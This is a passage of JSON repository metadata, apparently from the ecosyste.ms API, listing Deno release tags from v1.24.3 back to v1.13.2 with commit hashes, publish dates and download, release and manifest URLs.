d/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.